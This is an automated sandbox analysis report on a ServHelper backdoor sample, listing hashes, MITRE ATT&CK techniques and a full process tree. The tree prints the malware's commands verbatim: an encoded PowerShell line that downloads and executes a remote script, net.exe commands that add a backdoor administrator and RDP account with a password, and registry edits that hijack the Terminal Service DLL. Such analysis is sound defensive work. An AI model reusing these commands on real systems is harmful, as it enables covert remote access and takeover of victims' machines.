servhelper | a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41

Analysis

max time kernel
134s
max time network
131s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 13:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe
Size

6.8MB
MD5

d088405edcf61c7fb54b260bc6315a31
SHA1

997f482fcca4cc5704bb0bf8b47132dd34aa0a37
SHA256

a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41
SHA512

1bc794a0c84525d67b8a3aecdd4544942cced8996f0b04fa8da1649a14fdd746638ba87b850c3046a3e82c1a455c2168802fe85b45b86436ca2515885e7bb86c
SSDEEP

98304:q7WKfdq7RyQdh/ha7TTOzAElMLmZ7oo8kTApKGaRqc4O1XujlqScYEYrsG3AH:qCUdcRwfTTLmxoQT7RRq4ujltcYN9w

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
5	2464	powershell.exe
6	2464	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
2316	icacls.exe
2112	icacls.exe
1636	takeown.exe
1292	icacls.exe
572	icacls.exe
1324	icacls.exe
840	icacls.exe
564	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1332
1332

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
2316	icacls.exe
2112	icacls.exe
1636	takeown.exe
1292	icacls.exe
572	icacls.exe
1324	icacls.exe
840	icacls.exe
564	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000b000000015bd4-107.dat	upx
behavioral1/files/0x0008000000015be5-108.dat	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/2144-0-0x00000000001D0000-0x0000000001027000-memory.dmp	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2TSWOHYLZ0I28JSUHL34.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
2720	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0041aa4c478bda01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1064	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2692	powershell.exe
624	powershell.exe
2860	powershell.exe
1624	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
2464	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid	Process
468
1332
1332
1332
1332

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeRestorePrivilege	572	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeAuditPrivilege	2720	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeAuditPrivilege	2720	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1212	WMIC.exe
Token: SeAuditPrivilege	1212	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1212	WMIC.exe
Token: SeAuditPrivilege	1212	WMIC.exe
Token: SeDebugPrivilege	2464	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	Process	procid_target
PID 2144 wrote to memory of 2692	2144	a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe	29
PID 2144 wrote to memory of 2692	2144	a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe	29
PID 2144 wrote to memory of 2692	2144	a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe	29
PID 2692 wrote to memory of 2828	2692	powershell.exe	31
PID 2692 wrote to memory of 2828	2692	powershell.exe	31
PID 2692 wrote to memory of 2828	2692	powershell.exe	31
PID 2828 wrote to memory of 2480	2828	csc.exe	32
PID 2828 wrote to memory of 2480	2828	csc.exe	32
PID 2828 wrote to memory of 2480	2828	csc.exe	32
PID 2692 wrote to memory of 624	2692	powershell.exe	33
PID 2692 wrote to memory of 624	2692	powershell.exe	33
PID 2692 wrote to memory of 624	2692	powershell.exe	33
PID 2692 wrote to memory of 2860	2692	powershell.exe	35
PID 2692 wrote to memory of 2860	2692	powershell.exe	35
PID 2692 wrote to memory of 2860	2692	powershell.exe	35
PID 2692 wrote to memory of 1624	2692	powershell.exe	37
PID 2692 wrote to memory of 1624	2692	powershell.exe	37
PID 2692 wrote to memory of 1624	2692	powershell.exe	37
PID 2692 wrote to memory of 1636	2692	powershell.exe	41
PID 2692 wrote to memory of 1636	2692	powershell.exe	41
PID 2692 wrote to memory of 1636	2692	powershell.exe	41
PID 2692 wrote to memory of 1292	2692	powershell.exe	42
PID 2692 wrote to memory of 1292	2692	powershell.exe	42
PID 2692 wrote to memory of 1292	2692	powershell.exe	42
PID 2692 wrote to memory of 572	2692	powershell.exe	43
PID 2692 wrote to memory of 572	2692	powershell.exe	43
PID 2692 wrote to memory of 572	2692	powershell.exe	43
PID 2692 wrote to memory of 1324	2692	powershell.exe	44
PID 2692 wrote to memory of 1324	2692	powershell.exe	44
PID 2692 wrote to memory of 1324	2692	powershell.exe	44
PID 2692 wrote to memory of 840	2692	powershell.exe	45
PID 2692 wrote to memory of 840	2692	powershell.exe	45
PID 2692 wrote to memory of 840	2692	powershell.exe	45
PID 2692 wrote to memory of 564	2692	powershell.exe	46
PID 2692 wrote to memory of 564	2692	powershell.exe	46
PID 2692 wrote to memory of 564	2692	powershell.exe	46
PID 2692 wrote to memory of 2316	2692	powershell.exe	47
PID 2692 wrote to memory of 2316	2692	powershell.exe	47
PID 2692 wrote to memory of 2316	2692	powershell.exe	47
PID 2692 wrote to memory of 2112	2692	powershell.exe	48
PID 2692 wrote to memory of 2112	2692	powershell.exe	48
PID 2692 wrote to memory of 2112	2692	powershell.exe	48
PID 2692 wrote to memory of 2332	2692	powershell.exe	49
PID 2692 wrote to memory of 2332	2692	powershell.exe	49
PID 2692 wrote to memory of 2332	2692	powershell.exe	49
PID 2692 wrote to memory of 1064	2692	powershell.exe	50
PID 2692 wrote to memory of 1064	2692	powershell.exe	50
PID 2692 wrote to memory of 1064	2692	powershell.exe	50
PID 2692 wrote to memory of 400	2692	powershell.exe	51
PID 2692 wrote to memory of 400	2692	powershell.exe	51
PID 2692 wrote to memory of 400	2692	powershell.exe	51
PID 2692 wrote to memory of 2276	2692	powershell.exe	52
PID 2692 wrote to memory of 2276	2692	powershell.exe	52
PID 2692 wrote to memory of 2276	2692	powershell.exe	52
PID 2276 wrote to memory of 1140	2276	net.exe	53
PID 2276 wrote to memory of 1140	2276	net.exe	53
PID 2276 wrote to memory of 1140	2276	net.exe	53
PID 2692 wrote to memory of 1660	2692	powershell.exe	54
PID 2692 wrote to memory of 1660	2692	powershell.exe	54
PID 2692 wrote to memory of 1660	2692	powershell.exe	54
PID 1660 wrote to memory of 1540	1660	cmd.exe	55
PID 1660 wrote to memory of 1540	1660	cmd.exe	55
PID 1660 wrote to memory of 1540	1660	cmd.exe	55
PID 1540 wrote to memory of 1788	1540	cmd.exe	56

C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe
"C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fk1wjuse.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2828
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES76E6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC76E5.tmp"
      4⤵
      PID:2480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1636
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1292
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1324
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:840
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:564
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2316
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2112
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2332
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1064
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:400
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1140
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1660
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1540
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1788
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1648
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:1356
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1612
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:820
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1876
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1700
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1580

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
1⤵
PID:912
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc Ghasar4f5 /del
  2⤵
  PID:1328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
    3⤵
    PID:2924

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 8AMRDZfq /add
1⤵
PID:1160
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 8AMRDZfq /add
  2⤵
  PID:2784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 8AMRDZfq /add
    3⤵
    PID:1616

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2348
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1248

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
1⤵
PID:2960
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
  2⤵
  PID:896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" UEITMFAB$ /ADD
    3⤵
    PID:1768

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2356
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3064

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 8AMRDZfq
1⤵
PID:1600
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 8AMRDZfq
  2⤵
  PID:2140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 8AMRDZfq
    3⤵
    PID:2988

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2328
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2720

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2928
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1212

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2604
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES76E6.tmp

Filesize
1KB

MD5
1aba493d5f329036cccabdf1cb61e5eb

SHA1
17fc0e1d13538116eff139b0506f768a293f68fe

SHA256
a08406236e75c4ce3f84848ce0ac568c2bdb2e56e82045d4fcfff273670d7915

SHA512
baa269eca08386ceb5b281c2abe86d289d9ba87c4fc9194cfb82b20943ff58d3e1396ff116c2e7c9fe5e78be99349577a55f8ee087654409e25186a8b0985c28

Download Submit
C:\Users\Admin\AppData\Local\Temp\fk1wjuse.dll

Filesize
3KB

MD5
82060a8938f0a4be755ab7a22b178644

SHA1
e1530c22866456318a8d6da2daec181a046fb504

SHA256
61d5d7f27b25abc93229a4835a9c1c724b4a415311a81203eaa229cf2cf7bbbb

SHA512
2c6e0bc72891c06d9270b2e4efe8b2305a560b7534d1981fe956096c5741f0a70b6da25da58cca3a05d9a86bf180907866c5e9b3a8c151f8b823f27411e18416

Download Submit
C:\Users\Admin\AppData\Local\Temp\fk1wjuse.pdb

Filesize
7KB

MD5
1a0122c2a9d312dc4f88578562b17e62

SHA1
4afe20cf5e226d54e7565b531942e22f082c053f

SHA256
e91798092d892cf3e3b074e349ca876b40b85077edd1e3d35abecdd5e6103f34

SHA512
75ff3821d71ce2663abe9e1eda771f56e60e751dc53166ad8bf983a16bc395ec04c95d8e9b3da671b05b431cb172c6e6c1ec6b8c336b7780058e3fa0a86e1537

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
5db5ffa607b5b5ca17bfd6fb78403660

SHA1
1e793958cb1dd1dc99da4a50beaa2945561b7a16

SHA256
1fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89

SHA512
3d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c9c76eaa43438310e9f1a80ea763d679

SHA1
22daee73cee81c461fca9e0f56900eeb68b38afa

SHA256
f3fe1634ba2e411e2ff585afed9ae90e47dc7c9952a0e182d029bc1d8346bab3

SHA512
4328f5fa000b659597ea143cf8ce1d18ae0279c9be2e8e138be1916c4364f2db4369887cee3f3fc46363c0df94bc6adb016a5b09f2566f1c3b61d4cb4d3c877f

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC76E5.tmp

Filesize
652B

MD5
d04ce6399403426a07fbf75efb7e4485

SHA1
e3e62eb3aff018484ae0117bfce95be453857eb0

SHA256
462b4c23cafc039045fe9f3f91252a9cb9b72e2a8277602d3183d75cc8ec7f31

SHA512
6f8c936abd0b4dd87f574ebf7f33ec14f8b703b02a026a6ede87e90894b26ff1d569611fd085e2858bc706eb747ae26f34cd51a97dbbaf2d76da87a08c2f27e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fk1wjuse.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fk1wjuse.cmdline

Filesize
309B

MD5
093a758164c0fec72d3d3fcb5bb78871

SHA1
f53386aa0e6d210e81b23ad94ada22e45d6c3b1c

SHA256
a9330fccd68f021eaa4dc5ac6c37ed8a2882921c4e1eb563162d94720f6fe287

SHA512
73fddd766d191f39e89751db2c89210a05fc566754f1bef6d7d34aa742d5b6593adbc9c98184fe402a6bb3d9647e05c1b78d14160a78f5c51cd2c64f119450ca

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
96e498a3833f52ae46bcfdc391f73cf7

SHA1
ecaf72b46cf1cb074bde2914963bb1e61450ca95

SHA256
21a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b

SHA512
9f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
2ee3d03bb1f8bd257235fc70e92b17e1

SHA1
c36482b8f8229578dec1cc687aaf53084cb6d05e

SHA256
b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0

SHA512
39f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea

Download Submit
memory/624-58-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/624-60-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp

Filesize
9.6MB

Download
memory/624-52-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/624-53-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp

Filesize
9.6MB

Download
memory/624-51-0x000007FEEDF30000-0x000007FEEE8CD000-memory.dmp

Filesize
9.6MB

Download
memory/624-54-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/624-55-0x0000000002560000-0x00000000025E0000-memory.dmp

